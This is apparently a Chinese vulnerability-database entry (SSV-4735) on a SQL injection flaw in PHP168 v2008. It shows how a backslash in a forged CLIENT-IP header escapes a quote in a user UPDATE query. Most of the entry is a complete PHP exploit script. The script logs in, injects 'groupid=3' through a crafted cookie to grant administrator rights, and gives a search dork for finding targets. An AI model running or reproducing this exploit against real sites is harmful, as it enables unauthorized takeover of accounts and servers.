Php168 v2008 权限提升漏洞

基本字段

漏洞编号：: SSV-4735

披露/发现时间：: 未知

提交时间：: 2009-02-09

漏洞等级：

漏洞类别：: SQL 注入

影响组件：: PHP168

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0.45KB

简单分析下这个漏洞 common.inc.php if($_SERVER['HTTP_CLIENT_IP']){ $onlineip=$_SERVER['HTTP_CLIENT_IP']; }elseif($_SERVER['HTTP_X_FORWARDED_FOR']){ $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $onlineip=$_SERVER['REMOTE_ADDR']; } $onlineip = preg_replace(”/^([\d\.]+).*/”, ”\\1″, filtrate($onlineip)); //这个地方使用preg_replace存在着安全隐患,之前就暴过漏洞,官方修补的方法是用filtrate函数处理了下$onlineip看一下filtrate函数是怎么处理的 function.inc.php function filtrate($msg){ $msg = str_replace('&','&',$msg); $msg = str_replace(' ',' ',$msg); $msg = str_replace('"','"',$msg); $msg = str_replace("'",''',$msg); $msg = str_replace("<","<",$msg); $msg = str_replace(">",">",$msg); $msg = str_replace("\t"," ",$msg); $msg = str_replace("\r","",$msg); $msg = str_replace(" "," ",$msg); return $msg; } 过滤了 '"< 等,但是没有处理\ common.inc.php if($usr_oltime>30||!$usr_oltime){ $usr_oltime>600 && $usr_oltime=600; include(PHP168_PATH."php168/level.php"); if( isset($memberlevel[$lfjdb[groupid]]) ){ $SQL=”,groupid=8″; $lfjdb[money]=get_money($lfjuid); foreach( $memberlevel AS $key=>$value){ if($lfjdb[money]>=$value){ $SQL=”,groupid=$key”; } } }else{ $SQL=”"; } $db->query(”UPDATE {$pre}memberdata SET lastvist=’$timestamp’,lastip=’$onlineip’,oltime=oltime+’$usr_oltime’$SQL WHERE uid=’$lfjuid’”); //因为这个地方是拼接字符串的形式,所以可以使用\来转义’,然后利用$usr_oltime来注射:) 另外要注意的是$usr_oltime有一个简单的判断的,而且还要保证sql语句的语法正确,看下我构造的语句: UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='[\]‘,oltime=oltime+’[+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#]‘$SQL WHERE uid=’$lfjuid’ Php168 v2008 暂无 Php168

共 1 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.2KB

<?php print_r(' +---------------------------------------------------------------------------+ Php168 <= v2008 update user access exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by PHP168" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 5) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].’ host path user pass host: target server (ip/hostname) path: path to php168 user: login username pass: login password Example: php ’.$argv[0].’ localhost /php168/ +—————————————————————————+ ‘); exit; } error_reporting(7); ini_set(’max_execution_time’, 0); $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $pass = $argv[4]; $resp = send(); preg_match(’/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/’, $resp, $cookie); if ($cookie) if (strpos(send(), ’puret_t’) !== false) exit(”Expoilt Success!\nYou Are Admin Now!\n”); else exit(”Exploit Failed!\n”); else exit(”Exploit Failed!\n”); function rands($length = 8) { $hash = ”; $chars = ’ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz’; $max = strlen($chars) - 1; mt_srand((double)microtime() * 1000000); for ($i = 0; $i < $length; $i++) $hash .= $chars[mt_rand(0, $max)]; return $hash; } function send() { global $host, $path, $user, $pass, $cookie; if ($cookie) { $cookie[1] .= ’;USR=’.rands().”\t%2b31,groupid=3,introduce=0×70757265745f74 WHERE uid=$cookie[2]#\t\t”; $cmd = ”; $message = ”POST ”.$path.”member/userinfo.php HTTP/1.1\r\n”; $message .= ”Accept: */*\r\n”; $message .= ”Accept-Language: zh-cn\r\n”; $message .= ”Content-Type: application/x-www-form-urlencoded\r\n”; $message .= ”User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n”; $message .= ”CLIENT-IP: ryat\\\r\n”; $message .= ”Host: $host\r\n”; $message .= ”Content-Length: ”.strlen($cmd).”\r\n”; $message .= ”Connection: Close\r\n”; $message .= ”Cookie: ”.$cookie[1].”\r\n\r\n”; $message .= $cmd; } else { $cmd = ”username=$user&password=$pass&step=2″; $message = ”POST ”.$path.”login.php HTTP/1.1\r\n”; $message .= ”Accept: */*\r\n”; $message .= ”Accept-Language: zh-cn\r\n”; $message .= ”Content-Type: application/x-www-form-urlencoded\r\n”; $message .= ”User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n”; $message .= ”Host: $host\r\n”; $message .= ”Content-Length: ”.strlen($cmd).”\r\n”; $message .= ”Connection: Close\r\n\r\n”; $message .= $cmd; } $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ”; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?>